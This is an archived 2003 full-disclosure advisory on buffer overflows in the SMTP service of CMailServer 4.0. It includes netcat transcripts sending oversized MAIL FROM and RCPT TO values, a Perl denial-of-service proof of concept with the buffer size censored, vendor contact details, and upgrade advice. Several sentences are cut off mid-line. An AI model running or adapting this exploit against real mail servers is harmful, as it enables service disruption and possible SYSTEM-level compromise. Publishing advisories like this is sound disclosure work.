[VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0

From: Dennis Rand (derat_private)
Date: Sat May 10 2003 - 01:53:41 PDT

  • Next message: Matthew Murphy: "[Full-Disclosure] eServ Memory Leak Enables Denial of Service Attacks"

                        Multiple Buffer Overflow Vulnerabilities
                              Found in CMailServer 4.0
                              Discovered by Dennis Rand
    CMailServer, a small and easy to administer email server software and web 
    mail server software, can help you build your own email server for 
    Win NT/2000/XP. It enables you to send and receive email across the 
    Internet or within your LAN. The ESMTP authentication, ASP form web 
    mail and multiple domain names are supported. 
    CMailServer offers an unlimited email users license at a reasonable 
    and affordable price compared to other email server software. 
    For those small to medium sized companies, CMailServer will be an 
    economic and effective solution to handle their e-mail management 
    requirements. CMailServer also is a web mail server software and 
    provides full web mail service. The web mail is based on ASP. 
    You can customize your web mail interface freely. Give it a try 
    and find out how easy it is to build an email server and web mail 
    server for your own business.
    The problem is a Buffer Overflow in the SMTP protocol, within the 
    ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to
    It is possible to actually overwrite the exception handler on the stack
    A system compromise with code execution running as SYSTEM.
    Vulnerable systems:
     * ESMTP CMailServer 4.0.2003.03.27 SMTP Service
    Immune systems:
     * ESMTP CMailServer 4.0.2003.03.30 SMTP Service
    High - 	      An attacker is able to cause a DoS attack on the SMTP
                  And we can actually overwrite the exception handler on the
                  Allowing a system compromise with code execution running as
    The Vulnerability is a Buffer Overflow in the ESMTP CMailServer
    4.0.2002.11.24 SMTP Service
    When a malicious attacker sends a large amount into the "MAIL FROM" and the
    "RCPT TO"
    The buffer will overflow. If the code was carefully crafted, attackers could
    Arbitrary command in system privilege.
    The following transcript demonstrates a sample exploitation of the 
    ----------------------------- [Transcript] -----------------------------
    nc warlab.dk 25
    220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
    HELO Foobar
    250 win2k-serv
    Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
    <Connection closed>
    The same Vulnerability is in the RCPT TO
    nc warlab.dk 25
    220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
    HELO Foobar
    250 win2k-serv
    Mail From : adminat_private
    250 <adminat_private> Sender Ok
    Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
    <connection closed>
    ----------------------------- [Transcript] -----------------------------
    ----------------------------- [Exploit Code] -----------------------------
    #!/usr/bin/perl -w
    # ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
    # URL: http://www.infowarfare.dk/
    # EMAIL: derat_private
    # USAGE: sploit.pl <target ip>
    # Summary:
    # The problem is a Buffer Overflow in the SMTP protocol, within the 
    # ESMTP CMailServer, causing the service to shutdown
    # It is then where we can actually overwrite the exception handler on the
    stack allowing 
    # A system compromise with code execution running as SYSTEM.
    # Ive censored some of the source code out. =)
    # Solution: 
    # None at this time
    use IO::Socket;
    $target = shift() || "warlab.dk";
    my $port = 25;
    my $Buffer = "A" x <CENSORED> ; # 
    my $sock = IO::Socket::INET->new (
                                        PeerAddr => $target,
                                        PeerPort => $port,
                                        Proto => 'tcp'
                                     ) || die "could not connect: $!";
    my $banner = <$sock>;
    if ($banner !~ /^2.*/)
        print STDERR "Error: invalid server response '$banner'.\n";
    print $sock "HELO $target\r\n";
    $resp = <$sock>;
    print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
    $resp = <$sock>;
    print $sock "\r\n";
    print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
    ----------------------------- [Exploit Code] -----------------------------
    ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
    above-described attacks. 
    Earlier versions may be susceptible as well. To determine if a specific 
    implementation is vulnerable, experiment by following the above transcript. 
    -----[WORK AROUNDS
    Upgrade as soon as possible to version -> ESMTP CMailServer 4.0.2003.03.30
    SMTP Service
    or later. 
    The other workaround is to disable the SMTP service but that is not fun.
    Quoting YoungZSoft <yaoerat_private>:
    I thank you very very much for your report.
    We will fix this as soon as possible
    24/04/2003 Found the Vulnerability, and made an analysis.
    29/04/2003 Contacted Vendor at supportat_private 
    30/04/2003 Received response from vendor with a fix to test
    01/05/2003 New version tested negative for the vulnerabilities
    10/05/2003 Public Disclosure.
    The vulnerability was discovered and reported by <derat_private> Dennis
    The information in this bulletin is provided "AS IS" without warranty of any
    In no event shall we be liable for any damages whatsoever including direct,
    incidental, consequential, loss of business profits or special damages. 

    This archive was generated by hypermail 2b30 : Sun May 11 2003 - 00:42:17 PDT